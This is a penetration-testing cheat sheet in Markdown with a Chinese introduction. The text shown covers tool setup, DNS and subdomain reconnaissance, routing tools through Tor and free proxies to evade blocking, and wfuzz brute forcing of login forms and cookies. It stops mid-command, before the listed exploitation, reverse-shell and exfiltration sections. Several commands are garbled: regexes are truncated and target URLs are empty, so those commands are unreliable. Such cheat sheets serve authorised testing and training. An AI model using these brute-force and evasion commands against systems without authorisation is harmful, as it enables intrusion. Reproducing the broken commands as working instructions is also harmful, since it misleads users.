# 🦊 Fox Cheat Sheet – Penetration Testing

[`渗透测试（或 PenTesting）`](https://en.wikipedia.org/wiki/Penetration_test) 是指对计算机系统及其物理基础设施发起授权模拟攻击，以发现潜在的安全弱点和漏洞。此类模拟攻击的目的是识别系统中任何可能被攻击者利用的薄弱环节。这就像银行雇佣某人伪装成窃贼，试图闯入其建筑并进入金库。如果“窃贼”成功进入银行或金库，银行就能获得宝贵的信息，了解需要如何加强安全措施。如果您发现漏洞，请遵循[此指导](https://kb.cert.org/vuls/guidance/)以负责任的方式报告。 编写报告时应使用的网站： * [SysReptor Github](https://github.com/Syslifters/sysreptor) 或 [SysReptor](https://labs.sysre.pt/) * [attack.mitre.org](https://attack.mitre.org) * [cwe.mitre.org/data](https://cwe.mitre.org/data) * [first.org/cvss/calculator/4.0](https://www.first.org/cvss/calculator/4.0) * [nvd.nist.gov/ncp/repository](https://nvd.nist.gov/ncp/repository) * [owasp.org/www-project-top-ten](https://owasp.org/www-project-top-ten) * [cheatsheetseries.owasp.org](https://cheatsheetseries.owasp.org/Glossary.html) ## 概述 - [🦊 Fox Cheat Sheet – Penetration Testing](#-fox-cheat-sheet--penetration-testing) - [Overview](#overview) - [Fox Tips and Tricks](#fox-tips-and-tricks) - [0. Install and Setup Tools](#0-install-and-setup-tools) - [API Keys](#api-keys) - [User-Agents](#user-agents) - [DNS Resolvers](#dns-resolvers) - [ProxyChains-NG](#proxychains-ng) - [1. Reconnaissance](#1-reconnaissance) - [1.1 Useful Websites](#11-useful-websites) - [FOCA (Fingerprinting Organizations with Collected Archives)](#foca-fingerprinting-organizations-with-collected-archives) - [DNS](#dns) - [ASNmap](#asnmap) - [dig](#dig) - [DNSenum](#dnsenum) - [DNSmap](#dnsmap) - [DNSRecon](#dnsrecon) - [Fierce](#fierce) - [host](#host) - [nslookup](#nslookup) - [Nmap Enumaration](#nmap-enumaration) - [WHOIS](#whois) - [Amass](#amass) - [assetfinder](#assetfinder) - [Sublist3r](#sublist3r) - [Subfinder](#subfinder) - [httpx](#httpx) - [gau](#gau) - [urlhunter](#urlhunter) - [wfuzz](#wfuzz) - [Directory Fuzzing](#directory-fuzzing) - [dirb](#dirb) - [DirBuster](#dirbuster) - [Dirsearch](#dirsearch) - [feroxbuster](#feroxbuster) - [ffuf](#ffuf) - [gobuster](#gobuster) - [Google Dorks](#google-dorks) - [Chad](#chad) - [PhoneInfoga](#phoneinfoga) - [git-dumper](#git-dumper) - [TruffleHog](#trufflehog) - [katana](#katana) - [Scrapy Scraper](#scrapy-scraper) - [snallygaster](#snallygaster) - [IIS Tilde Short name Scanning](#iis-tilde-short-name-scanning) - [WhatWeb](#whatweb) - [Parsero](#parsero) - [EyeWitness](#eyewitness) - [Wordlists](#wordlists) - [2. Scanning/Enumeration](#2-scanningenumeration) - [2.1 Useful Websites](#21-useful-websites) - [masscan](#masscan) - [rustscan](#rustscan) - [Nmap](#nmap) - [NetExec](#netexec) - [NFS](#nfs) - [Samba](#samba) - [SNMP](#snmp) - [testssl.sh](#testsslsh) - [OpenSSL](#openssl) - [keytool](#keytool) - [uncover](#uncover) - [Databases](#databases) - [MYSQL](#mysql) - [MSSQL](#mssql) - [PostgreSQL](#postgresql) - [sqlite](#sqlite) - [Windows OS Enumeration](#windows-os-enumeration) - [Windows Basic Commands](#windows-basic-commands) - [nbtstat](#nbtstat) - [winfo](#winfo) - [nbtscan](#nbtscan) - [smblcient](#smblcient) - [rpcclient](#rpcclient) - [enum4linux](#enum4linux) - [3. Vulnerability Assesment/Exploiting](#3-vulnerability-assesmentexploiting) - [3.1 Useful Websites](#31-useful-websites) - [Collaborator Servers](#collaborator-servers) - [Subdomain Takeover](#subdomain-takeover) - [Search Exploits and Scanners](#search-exploits-and-scanners) - [Subzy](#subzy) - [subjack](#subjack) - [Nikto](#nikto) - [WPScan](#wpscan) - [Joomla](#joomla) - [Nuclei](#nuclei) - [Arjun](#arjun) - [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor) - [HTTP Response Splitting](#http-response-splitting) - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) - [SQL Injection](#sql-injection) - [sqlmap](#sqlmap) - [dotdotpwn](#dotdotpwn) - [Web Shells](#web-shells) - [Send a Payload With Python](#send-a-payload-with-python) - [SMTP](#smtp) - [4. Post Exploitation](#4-post-exploitation) - [4.1 Useful Websites](#41-useful-websites) - [Generate a Reverse Shell Payload](#generate-a-reverse-shell-payload) - [Generate a Reverse Shell Payload via MSFVenom](#generate-a-reverse-shell-payload-via-msfvenom) - [PowerShell Encoded Command](#powershell-encoded-command) - [Basics](#basics) - [Stabilizing Linux Shell](#stabilizing-linux-shell) - [Port Forwarding](#port-forwarding) - [SSH Port Forwarding#ssh-port-forwarding) - [sshuttle](#sshuttle) - [chisel](#chisel) - [socat](#socat) - [Netcat Portfwd](#netcat-portfwd) - [Meterpreter Portfwd](#meterpreter-portfwd) - [ligolo-ng](#ligolo-ng) - [Transfering Files Windows](#transfering-files-windows) - [Transfering Files Linux](#transfering-files-linux) - [Exfiltrating Data](#exfiltrating-data) - [Linux Exfiltrating Data](#linux-exfiltrating-data) - [SSH Exfiltrating Data](#ssh-exfiltrating-data) - [Windows Exfiltrating Data](#windows-exfiltrating-data) - [Active Directory and Windows Lateral Movement](#active-directory-and-windows-lateral-movement) - [ASREPRoast](#asreproast) - [bloodyAD](#bloodyad) - [Bloodhound](#bloodhound) - [CrackMapExec](#crackmapexec) - [DCSync](#dcsync) - [dcom-exec](#dcom-exec) - [Decode Password](#decode-password) - [Evil-WinRM](#evil-winrm) - [kerbrute](#kerbrute) - [ntpdate](#ntpdate) - [powerview](#powerview) - [psexec](#psexec) - [Rubeus](#rubeus) - [RunasCs](#runascs) - [smbexec](#smbexec) - [wmiexec.py](#wmiexecpy) - [Linux Lateral Movement](#linux-lateral-movement) - [Linux Search Non-Secure Files](#linux-search-non-secure-files) - [Unsafe Bash](#unsafe-bash) - [base64](#base64) - [Powershell ToBase64String and Linux Base64](#powershell-tobase64string-and-linux-base64) - [5. Password Cracking](#5-password-cracking) - [5.1 Useful Websites](#51-useful-websites) - [crunch](#crunch) - [hash-identifier](#hash-identifier) - [Hashcat](#hashcat) - [Cracking the JWT](#cracking-the-jwt) - [Hydra](#hydra) - [John the Ripper](#john-the-ripper) - [Password Spraying](#password-spraying) - [6. Wi-Fi](#6-wi-fi) - [Pixie Dust](#pixie-dust) - [7. One-Liners for Bug Bounty](#7-one-liners-for-bug-bounty) - [8. Miscellaneous](#8-miscellaneous) - [8.1 Useful Websites](#81-useful-websites) - [cURL](#curl) - [Ncat](#ncat) - [Port Scanner](#port-scanner) - [Send Files](#send-files) - [Executing Remote Script](#executing-remote-script) - [Chat with Encryption](#chat-with-encryption) - [Banner Grabbing](#banner-grabbing) - [HTTPS-OpenSSL](#https-openssl) - [Catch Shell](#catch-shell) - [multi/handler](#multihandler) - [ngrok](#ngrok) - [Simple Web-Server](#simple-web-server) - [SSH](#ssh) - [swaks](#swaks) - [xfreerdp](#xfreerdp) - [Additional References](#additional-references) ## Fox Tips and Tricks

Hello there! Don't miss out – let's check it out now 🦊

» All suggestions are welcome «

## 0. Install and Setup Tools **[`^ back to top ^`](#overview)** Most tools can be installed with the Linux package manager: ``` apt update && apt -y install sometool ``` For more information see [kali.org/tools](https://www.kali.org/tools). Some Python tools need to be downloaded and installed manually: ``` python3 setup.py install ``` Or, installed from the [pipx](https://pipx.pypa.io/): ``` # https://github.com/pypa/pipx python3 -m pip install --user pipx python3 -m pipx ensurepath # Install an application globally: pipx install pycowsay pycowsay mooo # Run an application without installing: pipx run pycowsay moo ``` Some Golang tools need to be downloaded and built manually: ``` go build sometool.go ``` Or, installed directly: ``` go install -v [github.com/user/sometool@latest](https://github.com/user/sometool@latest) ``` For more information see [pkg.go.dev](https://pkg.go.dev). To set up Golang, run: ``` apt -y install golang echo "export GOROOT=/usr/lib/go" >> ~/.zshrc echo "export GOPATH=$HOME/go" >> ~/.zshrc echo "export PATH=$GOPATH/bin:$GOROOT/bin:$PATH" >> ~/.zshrc source ~/.zshrc ``` If you use other console, you might need to write to `~/.bashrc`, etc. Some tools, that are in the form of binaries or shell scripts, can be moved to `/usr/bin/` directory for the ease of use: ``` mv sometool.sh /usr/bin/sometool && chmod +x /usr/bin/sometool ``` Some Java tools need to be downloaded and ran manually with Java (JRE): ``` java -jar sometool.jar ``` ### API Keys **[`^ back to top ^`](#overview)** List of useful APIs to integrate in your tools: * [shodan.io](https://developer.shodan.io) – IoT search engine and more. * [censys.io](https://search.censys.io/api) – domain lookup and more. * [github.com](https://github.com/settings/tokens) – public source code repository lookup. * [virustotal.com](https://developers.virustotal.com/reference/overview) – malware database lookup. * [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) – ProjectDiscovery tools ### User-Agents **[`^ back to top ^`](#overview)** Download a list of bot-safe User-Agents, requires [scrapeops.io](https://scrapeops.io) API key: ``` python3 -c 'import json, requests; open("./user_agents.txt", "w").write(("\n").join(requests.get("[http://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY&num_results=100](http://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY&num_results=100)", verify = False).json()["result"]))' ``` ### DNS Resolvers **[`^ back to top ^`](#overview)** Download a list of trusted DNS resolvers, or manually from [trickest/resolvers](https://github.com/trickest/resolvers): ``` python3 -c 'import json, requests; open("./resolvers.txt", "w").write(requests.get("[https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt)", verify = False).text)' ``` ### ProxyChains-NG **[`^ back to top ^`](#overview)** If Google or any other search engine or service blocks your tool, use ProxyChains-NG and Tor to bypass the restriction. Installation: ``` apt update && apt -y install proxychains4 tor torbrowser-launcher ``` Do the following changes in `/etc/proxychains4.conf`: ``` round_robin chain_len = 1 proxy_dns remote_dns_subnet 224 tcp_read_time_out 15000 tcp_connect_time_out 8000 [ProxyList] socks5 127.0.0.1 9050 ``` Make sure to comment any chain type other than `round_robin` – e.g., comment `strict_chain` into `# strict_chain`. Start Tor: ``` service tor start ``` Then, run any tool you want: ``` proxychains4 sometool ``` Using only Tor most likely won't be enough, you will need to add more proxies \([1](https://geonode.com/free-proxy-list)\)\([2](https://proxyscrape.com/home)\) to `/etc/proxychains4.conf`; however, it is hard to free and stable proxies that are not already blacklisted. Download a list of free proxies: ``` curl -s '[https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc](https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc)' -H 'Referer: [https://proxylist.geonode.com/](https://proxylist.geonode.com/)' | jq -r '.data[] | "\(.protocols[]) \(.ip) \(.port)"' > proxychains.txt curl -s '[https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc](https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc)' -H 'Referer: [https://proxylist.geonode.com/](https://proxylist.geonode.com/)' | jq -r '.data[] | "\(.protocols[])://\(.ip):\(.port)"' > proxies.txt ``` ## 1. Reconnaissance **[`^ back to top ^`](#overview)** ### 1.1 Useful Websites **[`^ back to top ^`](#overview)** **Domain, IP & Network Reconnaissance** * [whois.domaintools.com](https://whois.domaintools.com) – domain WHOIS lookup. * [dnsdumpster.com](https://dnsdumpster.com/) – DNS recon and research. * [network-tools.com](https://network-tools.com/nslook/) – network troubleshooting tools. * [dnsqueries.com](https://www.dnsqueries.com/en/) – DNS diagnostic tools. * [mxtoolbox.com](https://mxtoolbox.com/) – DNS, SMTP, and blacklist checks. * [otx.alienvault.com](https://otx.alienvault.com) – domain lookup. * [reverseip.domaintools.com](https://reverseip.domaintools.com) – web-based reverse IP lookup. * [lookup.icann.org](https://lookup.icann.org) – ICANN registration data lookup. * [sitereport.netcraft.com](https://sitereport.netcraft.com) – website infrastructure profiling. * [searchdns.netcraft.com](https://searchdns.netcraft.com) – web-based DNS lookup. * [search.censys.io](https://search.censys.io) – domain lookup and more. * [crt.sh](https://crt.sh) – certificate fingerprinting. * [radar.cloudflare.com](https://radar.cloudflare.com) – website lookup and more. * [dnschecker.org](https://dnschecker.org/) – global DNS propagation check. * [haveibeensquatted.com](https://haveibeensquatted.com/) – check for typosquatting domains. * [ifconfig.io](https://ifconfig.io/) – network info. * [abuseipdb.com](https://www.abuseipdb.com/) – check IP reputation and threat intelligence. * [ipvoid.com](https://www.ipvoid.com/) – IP blacklists and tools. * [myip.ms](https://myip.ms/) – IP address information. * [search.arin.net](https://search.arin.net/) – ARIN IP/ASN search. * [macaddress.io](https://macaddress.io/) – MAC address vendor lookup. * [iknowwhatyoudownload.com](https://iknowwhatyoudownload.com/en/peer/) – discover torrent downloads by IP. * [opencellid.org](https://opencellid.org/) – cell tower locations for OSINT. **OSINT Frameworks & Search** * [commoncrawl.org](https://commoncrawl.org/get-started) – web crawl dumps. * [searchcode.com](https://searchcode.com) – source code search engine. * [archive.org](https://archive.org) – wayback machine. * [shodan.io](https://www.shodan.io) – IoT search engine. * [whoisds.com](https://www.whoisds.com/newly-registered-domains) – newly registered domains. * [osintframework.com](https://osintframework.com/) – huge collection of OSINT tools. * [nitinpandey.in/ihunt](https://nitinpandey.in/ihunt/) – complete OSINT framework. * [abhijithb200.github.io/investigator](https://abhijithb200.github.io/investigator/) – OSINT tools aggregator. * [cybersec.org/search/index.php](https://cybersec.org/search/index.php) – specialized cybersecurity search engine. * [extract.pics](https://extract.pics/) – extract images from websites. **People, Accounts & Breaches** * [haveibeenpwned.com](https://haveibeenpwned.com) – check if email/phone was compromised in a breach. * [haveibeenpwned.com/Passwords](https://haveibeenpwned.com/Passwords) – Pwned passwords lookup. * [intelx.io](https://intelx.io) – database breaches. * [search.wikileaks.org](https://search.wikileaks.org) – WikiLeaks document search. * [pgp.circl.lu](https://pgp.circl.lu) – OpenPGP key server. * [sherlockeye.io](https://sherlockeye.io) – account lookup. * [whatsmyname.app](https://whatsmyname.app/) – username enumeration across sites. * [usersearch.ai](https://usersearch.ai/) – username OSINT. * [sec.hpi.de/ilc/](https://sec.hpi.de/ilc/?) – identity leak checker. * [bugmenot.com](http://bugmenot.com/) – bypass forced logins with shared accounts. **Malware Analysis & Threat Intel (Sandboxes)** * [opendata.rapid7.com](https://opendata.rapid7.com) – scan dumps. * [virustotal.com](https://www.virustotal.com/gui/home/search) – malware database lookup. * [virusscan.jotti.org](https://virusscan.jotti.org/en-US/scan-file) – free online malware scanner. * [filescan.io](https://www.filescan.io/scan) – next-gen malware analysis platform. * [virscan.org](https://www.virscan.org/) – multi-engine file scanner. * [docguard.io](https://www.docguard.io/) – document malware analysis. * [tria.ge](https://tria.ge/login) – malware analysis sandbox. * [filesec.io](https://filesec.io/) – latest file extension security intel. * [threatfox.abuse.ch](https://threatfox.abuse.ch/browse/) – share and search indicators of compromise (IOCs). * [urlscan.io](https://urlscan.io/) – sandbox for URLs. * [url2png.com](https://www.url2png.com/) – secure website screenshots. * [phishtank.org](https://phishtank.org/) – phishing URL database. **[`^ back to top ^`](#overview)** ### FOCA (Fingerprinting Organizations with Collected Archives) [`FOCA (Fingerprinting Organizations with Collected Archives)`](https://github.com/ElevenPaths/FOCA) – Find metadata and hidden information in files. Minimum requirements: * Microsoft Windows (64 bits). Versions 7, 8, 8.1 and 10. * Download and install [MS SQL Server 2014 Express](https://www.microsoft.com/en-us/download/details.aspx?id=42299) or greater. * Download and install [MS .NET Framework 4.7.1 Runtime](https://dotnet.microsoft.com/download/dotnet-framework/net471) or greater. * Download and install [MS Visual C++ 2010 (64-bit)](https://www.microsoft.com/en-us/download/developer-tools.aspx) or greater. * Download and install [FOCA](https://github.com/ElevenPaths/FOCA/releases). GUI is very intuitive. ### DNS **[`^ back to top ^`](#overview)** #### ASNmap **[`^ back to top ^`](#overview)** Installation: ``` go install -v [github.com/projectdiscovery/asnmap/cmd/asnmap@latest](https://github.com/projectdiscovery/asnmap/cmd/asnmap@latest) ``` Get the ProjectDiscovery API key from [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) and run: ``` asnmap -auth ``` Fetch ASN for IP: ``` asnmap --silent -r resolvers.txt -i ip | tee -a asnmap_asn_results.txt ``` Fetch CIDRs for ASN: ``` asnmap --silent -r resolvers.txt -a asn | tee -a asnmap_cidr_results.txt ``` **If ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not be all within your scope!** Fetch CIDRs for organization ID: ``` asnmap --silent -r resolvers.txt -org id | tee -a asnmap_cidr_results.txt ``` #### dig **[`^ back to top ^`](#overview)** Fetch name servers: ``` dig +noall +answer -t NS somedomain.com ``` Fetch mail exchange servers: Interrogate a name server: ``` dig +noall +answer -t ANY somedomain.com @ns.somedomain.com dig any DOMAIN @IP_OR_DOMAIN ``` Fetch the zone file from a name server: ``` dig +noall +answer -t AXFR somedomain.com @ns.somedomain.com dig axfr DOMAIN @IP_OR_DOMAIN ``` After that test nameservers: `host -l < domain > < nameserver >` ``` host -l domain.com ns2.domain.com ``` Reverse IP lookup: ``` dig +noall +answer -x 192.168.8.5 ``` Subdomain Takeover Check if subdomains are dead, look for `NXDOMAIN`, `SERVFAIL`, or `REFUSED` status codes: ``` for subdomain in $(cat subdomains.txt); do res=$(dig "${subdomain}" -t A +noall +comments +timeout=3 | grep -Po '(?<=status\:\ )[^\s]+(? ``` Brute Force, the file is saved in `/tmp`: ``` dnsmap targetdomain.com -r ``` #### DNSRecon **[`^ back to top ^`](#overview)** DNSRecon DNS Brute Force: ``` dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml ``` Interrogate name servers: ``` dnsrecon -t std --json /root/Desktop/dnsrecon_std_results.json -d somedomain.com dnsrecon -t axfr --json /root/Desktop/dnsrecon_axfr_results.json -d somedomain.com dnsrecon --iw -f --threads 50 --lifetime 3 -t brt --json /root/Desktop/dnsrecon_brt_results.json -D subdomains-top1mil.txt -d somedomain.com ``` DNSRecon can perform a dictionary attack with a user-defined wordlist, but make sure to specify a full path to the wordlist; otherwise, DNSRecon might not recognize it. Make sure to specify a full path to the output file; otherwise, it will default to `/usr/share/dnsrecon/` directory, i.e., to the root directory. Extract subdomains from the results: ``` jq -r '.[] | select(.type | test("^A$|^CNAME$|^SRV$")) | .name // empty, .target // empty' dnsrecon_std_results.json | sort -uf | tee -a subdomains.txt ``` Extract IPs from the results: ``` jq -r '.[] | select(.type | test("^A$|^CNAME$|^PTR$")) | .address // empty' dnsrecon_std_results.json | sort -uf | tee -a ips.txt ``` Extract canonical names (CNAMEs) from the results: ``` jq -r '.[] | select(.type | test("^CNAME$")) | .target // empty' dnsrecon_std_results.json | sort -uf | tee -a cnames.txt ``` Reverse IP lookup: ``` dnsrecon --json /root/Desktop/dnsrecon_ptr_results.json -s -r 192.168.8.0/24 ``` Extract subdomains from the reverse IP lookup results: ``` jq -r '.[] | if type == "array" then .[].name else empty end' dnsrecon_ptr_results.json | sort -uf | tee -a subdomains.txt ``` #### Fierce **[`^ back to top ^`](#overview)** Interrogate name servers: ``` fierce -dns targetdomain.com fierce -file fierce_std_results.txt --domain somedomain.com fierce -file fierce_brt_results.txt --subdomain-file subdomains-top1mil.txt --domain somedomain.com ``` **By default, Fierce will perform dictionary attack with its built-in wordlist.** #### host **[`^ back to top ^`](#overview)** **Some DNS servers will not respond to DNS quieries of type 'ANY', use type 'A' instead.** Gather IPs for the given subdomains (ask for `A` records): ``` for subdomain in $(cat subdomains.txt); do res=$(host -t A "${subdomain}" | grep -Po '(?<=has\ address\ )[^\s]+(? host -t ns domain.com ``` After that test nameservers: ``` host -l < domain > < nameserver > host -l domain.com ns2.domain.com ``` #### Nmap Enumaration **[`^ back to top ^`](#overview)** ``` nmap -F --dns-server ``` #### WHOIS **[`^ back to top ^`](#overview)** Gather ASNs from IPs: ``` for ip in $(cat ips.txt); do res=$(whois -h whois.cymru.com "${ip}" | grep -Poi '^\d+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_asns.txt grep -Po '(?<=\|\ )(?(?!\ \|).)+' ips_to_asns.txt | sort -uf | tee -a asns.txt ``` **If ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not be all within your scope!** Gather organization names from IPs: ``` for ip in $(cat ips.txt); do res=$(whois -h whois.arin.net "${ip}" | grep -Po '(?<=OrgName\:)[\s]+\K.+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_organization_names.txt grep -Po '(?<=\|\ )(?(?!\ \|).)+' ips_to_organization_names.txt | sort -uf | tee -a organization_names.txt ``` Check if any of the IPs belong to [GitHub](https://github.com) organization, read more about GitHub takeover in this [H1 article](https://www.hackerone.com/application-security/guide-subdomain-takeovers). ### Amass **[`^ back to top ^`](#overview)** Gather subdomains using OSINT: ``` amass enum -o amass_results.txt -trf resolvers.txt -d somedomain.com ``` **Amass has built-in DNS resolvers.** Extract IPs from the results: ``` grep '(?<=(?:a_record|contains)\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a ips.txt ``` Extract subdomains from the results: ``` grep '^[^\s]+(?=\ \(FQDN\))|(?<=ptr_record\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a subdomains.txt ``` Extract canonical names (CNAMEs) from the results: ``` grep '(?<=(?:a_record|contains)\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a cnames.txt ``` The below ASN and CIDR scans will take a long time to finish. **If ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not be all within your scope!** Gather subdomains from ASN: ``` amass intel -o amass_asn_results.txt -trf resolvers.txt -asn 13337 ``` Gather subdomains from CIDR: ``` amass intel -o amass_cidr_results.txt -trf resolvers.txt -cidr 192.168.8.0/24 ``` ### assetfinder **[`^ back to top ^`](#overview)** Gather subdomains using OSINT: ``` assetfinder --subs-only somedomain.com | grep -v '*' | tee assetfinder_results.txt ``` ### Sublist3r **[`^ back to top ^`](#overview)** Gather subdomains using OSINT: ``` sublist3r -o sublister_results.txt -d somedomain.com ``` ### Subfinder **[`^ back to top ^`](#httpx)** Installation: ``` go install -v [github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest](https://github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest) ``` Gather subdomains using OSINT: ``` subfinder -t 10 -timeout 3 -nW -o subfinder_results.txt -rL resolvers.txt -d somedomain.com ``` **Subfinder has built-in DNS resolvers.** Set your API keys in `/root/.config/subfinder/provider-config.yaml` file as following: ``` shodan: - SHODAN_API_KEY censys: - CENSYS_API_ID:CENSYS_API_SECRET github: - GITHUB_API_KEY virustotal: - VIRUSTOTAL_API_KEY ``` ### httpx **[`^ back to top ^`](#overview)** Check if subdomains are alive, map live hosts: ``` httpx-toolkit -o httpx_results.txt -l subdomains.txt httpx-toolkit -random-agent -json -o httpx_results.json -threads 100 -timeout 3 -l subdomains.txt -ports 80,81,443,4443,8000,8008,8080,8081,8403,8443,8888,9000,9008,9080,9081,9403,9443 ``` Filter out subdomains from the JSON results: ``` jq -r 'select(."status_code" | tostring | test("^2|^3|^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long.txt jq -r 'select(."status_code" | tostring | test("^2")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx.txt jq -r 'select(."status_code" | tostring | test("^2|^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx_4xx.txt jq -r 'select(."status_code" | tostring | test("^3")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_3xx.txt jq -r 'select(."status_code" | tostring | test("^401$")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_401.txt jq -r 'select(."status_code" | tostring | test("^403$")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_403.txt jq -r 'select(."status_code" | tostring | test("^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_4xx.txt jq -r 'select(."status_code" | tostring | test("^5")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_5xx.txt grep -Po 'http\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_http.txt grep -Po 'https\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_https.txt grep -Po '(?<=\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short.txt grep -Po '(?<=http\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_http.txt grep -Po '(?<=https\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_https.txt grep -Po '(?<=\:\/\/)[^\s\:]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live.txt ``` Check if a path exists on a web server: ``` httpx-toolkit -status-code -content-length -o httpx_results.txt -l subdomains_live_long.txt -path /.git ``` ### gau **[`^ back to top ^`](#overview)** Gather URLs from the [wayback machine](https://archive.org): ``` getallurls somedomain.com | tee gau_results.txt for subdomain in $(cat subdomains_live.txt); do getallurls "${subdomain}"; done | sort -uf | tee gau_results.txt ``` Filter out URLs from the results: ``` httpx-toolkit -random-agent -json -o httpx_gau_results.json -threads 100 -timeout 3 -r resolvers.txt -l gau_results.txt jq -r 'select(."status_code" | tostring | test("^2")).url' httpx_gau_results.json | sort -uf | tee -a gau_2xx_results.txt jq -r 'select(."status_code" | tostring | test("^2|^4")).url' httpx_gau_results.json | sort -uf | tee -a gau_2xx_4xx_results.txt jq -r 'select(."status_code" | tostring | test("^3")).url' httpx_gau_results.json | sort -uf | tee -a gau_3xx_results.txt jq -r 'select(."status_code" | tostring | test("^401$")).url' httpx_gau_results.json | sort -uf | tee -a gau_401_results.txt jq -r 'select(."status_code" | tostring | test("^403$")).url' httpx_gau_results.json | sort -uf | tee -a gau_403_results.txt ``` ### urlhunter **[`^ back to top ^`](#overview)** Installation: ``` go install -v [github.com/utkusen/urlhunter@latest](https://github.com/utkusen/urlhunter@latest) ``` Gather URLs from URL shortening services: ``` urlhunter -o urlhunter_results.txt -date latest -keywords subdomains_live.txt ``` ### wfuzz **[`^ back to top ^`](#overview)** Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the `FUZZ` keyword by the value of a given payload. ``` pipx install wfuzz ``` Let's search the subdomains with wfuzz: ``` wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "" -H "Host: FUZZ." --hl 7 wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ." -u http:// -t 100 wfuzz -H "Host: FUZZ." --hw 11 -c -z file,"/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt" http:/// ``` Fuzz directories: ``` wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u [https://somesite.com/WFUZZ](https://somesite.com/WFUZZ) -w directory-list-lowercase-2.3-medium.txt ``` Let's search the directories and files with wfuzz: ``` wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt --sc 200,202,204,301,302,307,403 http:///FUZZ ``` Login Form bruteforce. POST, Single list, filter string (hide): ``` wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http:///zabbix/index.php #Here we have filtered by line ``` Login Form bruteforce. POST, 2 lists, filter code (show): ``` wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http:///zabbix/index.php #Here we have filtered by code ``` Login Form bruteforce. GET, 2 lists, filter stringshow), proxy, cookies: ``` wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "[http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in](http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in)" ``` Cookie/Header bruteforce (vhost brute). Cookie, filter code (show), proxy: ``` wfuzz -c -w users.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ" "[http://example.com/index.php](http://example.com/index.php)" ``` Cookie/Header bruteforce (vhost brute). User-Agent, filter code (hide), proxy: ``` wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "User-Agent: FUZZ" "[http://example.com/index.php](http://example.com/index.php)" ``` Fuzz parameter values: ``` wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "[https://somesite.com/someapi?someparam=WFUZZ](https://somesite.com/someapi?someparam=WFUZZ)" -w somewordlist.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "[https://somesite.com/someapi](https://somesite.com/someapi)" -d "someparam=WFUZZ" -w somewordlist.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "[https://somesite.com/someapi](https://somesite.com/someapi)" -d "{\"someparam\": \"WFUZZ\"}" -w somewordlist.txt ``` Fuzz parameters: ``` wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "[https://somesite.com/someapi?WFUZZ=somevalue](https://somesite.com/someapi?WFUZZ=somevalue)" -w somewordlist.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "[https://somesite.com/someapi](https://somesite.com/someapi)" -d "WFUZZ=somevalue" -w somewordlist.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 